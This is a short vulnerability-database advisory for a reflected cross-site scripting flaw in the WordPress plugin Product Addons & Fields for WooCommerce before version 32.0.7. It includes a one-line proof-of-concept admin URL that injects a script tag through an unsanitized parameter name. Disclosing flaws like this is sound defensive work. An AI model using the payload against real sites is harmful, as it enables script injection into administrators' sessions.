Lucene search

K
wpexploitAlex SanfordWPEX-ID:1187E041-3BE2-4613-8D56-C2394FCC75FB
HistoryMay 01, 2023 - 12:00 a.m.

Product Addons & Fields for WooCommerce < 32.0.7 - Reflected Cross-Site Scripting

2023-05-0100:00:00
Alex Sanford
145
woocommerce
addon
xss
vulnerability
exploit

EPSS

0.001

Percentile

31.2%

The plugin does not sanitize and escape some URL parameters, leading to Reflected Cross-Site Scripting.

Ensure WooCommerce is installed. Visit the following path, while logged in as an Admin:

/wp-admin/admin.php?page=ppom&productmeta_id=5&do_meta=edit&"><script>alert(/XSS/)</script>=1

EPSS

0.001

Percentile

31.2%

Related for WPEX-ID:1187E041-3BE2-4613-8D56-C2394FCC75FB